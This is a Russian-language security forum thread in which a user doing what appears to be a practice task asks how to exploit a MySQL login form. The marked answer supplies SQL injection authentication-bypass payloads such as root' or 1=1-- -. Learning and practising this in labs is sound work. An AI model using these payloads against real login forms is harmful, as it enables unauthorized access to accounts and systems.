• Твой профиль заполнен на 0%. Заполни за 1 минуту, чтобы тебя нашли единомышленники и работодатели. Заполнить →

SQL иньекция

  • Автор темы Автор темы ~localhost
  • Дата начала Дата начала

~localhost

Green Team
30.10.2017
224
49
привет делаю задание, вообще туго с иньекциями.
после ввода
login:root ' true --
pass" 1

выдает следующую ошибку: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'true --' and `password` = SHA1( CONCAT('1', `salt`)) limit 1' at line 1

Подскажите как проэксплуатировать?
 
Решение
В пейлоаде нарушен синтаксис SQL. Поэкспериментируй с этими пейлоадами

root' or true -- - root' or 1=1-- - root' or 'a'='a
В пейлоаде нарушен синтаксис SQL. Поэкспериментируй с этими пейлоадами

root' or true -- - root' or 1=1-- - root' or 'a'='a
 
Решение
Загугли "mysql bypass auth" , "bypass admin sqli"
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab